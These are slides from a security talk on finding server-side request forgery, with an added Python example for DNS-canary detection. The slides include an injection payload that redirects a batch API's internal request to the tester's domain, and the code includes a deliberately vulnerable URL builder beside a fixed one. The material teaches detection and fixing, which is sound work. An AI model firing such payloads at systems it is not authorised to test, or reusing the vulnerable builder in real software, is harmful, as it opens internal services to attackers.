Fast (and almost automatic) SSRF detection
Eldar Zaitov

Whoami
• Yandex
• More Smoked Leet Chicken CTF team
• CTFtime.org

Server Side Request Forgery

SSRF sources
• XXE and variations
• Declared functionality
• Errors in URL generation

POST /ws/mail/v2.0/jsonrpc
Content-Type: application/json

{
  "method":"GetUserData",
  "params":[
    {"includeUnverifiedExtAcct":true}
  ]
}

http://internal.host.com/ws/mail/v2.0/jsonrpc

POST /ws/v3/batch HTTP/1.1
Content-Type: application/json

{
  "requests": [
    {
      "method":"POST",
      "uri":"/ws/mail/v2.0/jsonrpc",
      "payload": {
        "method":"GetUserData",
        "params":[{"includeUnverifiedExtAcct":true}]
      }
    }
  ]
}

http://internal.host.com/ws/mail/v2.0/jsonrpc

Detection
• Output / Error based
• Backconnect
• DNS

POST /ws/v3/batch HTTP/1.1
Content-Type: application/json

{
  "requests": [
    {
      "method":"POST",
      "uri":".zndemo.kyprizel.net/",
      "payload": {
        "method":"GetUserData",
        "params":[{"includeUnverifiedExtAcct":true}]
      }
    }
  ]
}

http://internal.host.zndemo.kyprizel.net/

http://some.internal.domain.and.host.com.zndemo.kyprizel.net/

Detection / DNS sniffer
zndemo   IN  A   37.9.65.78
         IN  NS  sniffer.kyprizel.net

Fuzzing
• Request parameters, headers
• Request body:
  • multipart/formdata
  • XML
  • application/json
  • whatever

Detection / tools
• Burp suite plugin
• Fuzzer
• DNS server (optional)

https://github.com/kyprizel/ussrfuzzer
@kyprizel
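The URL-generation mistake on the batch slide and the DNS-based detection it enables, as an added Python example (not code from the talk or from ussrfuzzer). The zone name and the internal host come from the slides; the BIND-style query log format, the sample log lines, the canary labelling scheme and all function names are assumptions made for this example.

```python
import re
import secrets
from urllib.parse import urlsplit

# Values taken from the slides.
CANARY_ZONE = "zndemo.kyprizel.net"
INTERNAL_HOST = "internal.host.com"

# BIND-style query log line (assumed format for the sniffer's log).
QUERY_RE = re.compile(
    r"client (?P<client>[0-9a-fA-F.:]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\w+)"
)


def build_internal_url_vulnerable(host, uri):
    """URL generation the way the batch endpoint on the slides appears to do it:
    plain concatenation, so a "uri" that does not start with "/" becomes part
    of the hostname and the request leaves the internal network."""
    return "http://" + host + uri


def build_internal_url_fixed(host, uri):
    """Hardened variant: only an absolute path is accepted, and the result is
    parsed back to confirm the authority part was not altered."""
    if not uri.startswith("/") or uri.startswith("//"):
        raise ValueError("uri must be an absolute path")
    url = "http://" + host + uri
    if urlsplit(url).hostname != host:
        raise ValueError("uri altered the target host")
    return url


def _label(text):
    """Reduce an arbitrary string to a safe DNS label fragment."""
    return re.sub(r"[^a-z0-9]", "", text.lower())[:20] or "x"


def make_canary(request_id, point, zone=CANARY_ZONE, token=None):
    """Build a unique hostname under the sniffer zone for one injection point,
    plus the payload the fuzzer inserts (a suffix, as on the slide: ".<host>/").
    The token is random unless fixed for a test."""
    token = token or secrets.token_hex(4)
    host = f"{_label(request_id)}-{_label(point)}-{token}.{zone}"
    return host, "." + host + "/"


def correlate(log_lines, canaries):
    """Map sniffer log lines back to the injection point that caused them.
    canaries: {canary_host: (request_id, point)}.  Returns
    {(request_id, point): [(leaked_prefix, client_ip, qtype), ...]}.
    The leaked prefix is whatever the target put in front of our suffix,
    usually its internal hostname."""
    hits = {}
    for line in log_lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        qname = m["qname"].rstrip(".").lower()
        for host, origin in canaries.items():
            if qname == host:
                prefix = ""
            elif qname.endswith("." + host):
                prefix = qname[: -len(host) - 1]
            else:
                continue
            hits.setdefault(origin, []).append((prefix, m["client"], m["qtype"]))
    return hits


# Constructed sniffer log: two lookups triggered by the canary, one unrelated.
SAMPLE_LOG = [
    "client 203.0.113.10#51234: query: internal.host.com.r12-uri-9f3a.zndemo.kyprizel.net IN A +",
    "client 203.0.113.10#51234: query: some.internal.domain.and.host.com.r12-uri-9f3a.zndemo.kyprizel.net IN AAAA +",
    "client 198.51.100.7#33221: query: www.example.com IN A +",
]


def demo():
    host, payload = make_canary("r12", "uri", token="9f3a")
    # What the vulnerable concatenation turns the batch request into:
    leaked_url = build_internal_url_vulnerable(INTERNAL_HOST, payload)
    hits = correlate(SAMPLE_LOG, {host: ("r12", "uri")})
    return leaked_url, hits


if __name__ == "__main__":
    url, hits = demo()
    print("vulnerable URL:", url)
    for origin, entries in hits.items():
        for prefix, client, qtype in entries:
            print(f"{origin}: {qtype} lookup from {client}, leaked prefix {prefix!r}")
```

The canary label carries the request id and the injection point, so a single query in the sniffer's log is enough to say which parameter of which request reached an outbound resolver; the part of the query name in front of the suffix is the internal hostname the target prepended, which is the information the two `http://...zndemo.kyprizel.net/` slides show. On the defensive side, `build_internal_url_fixed` is the check that stops the batch endpoint from ever producing such a name.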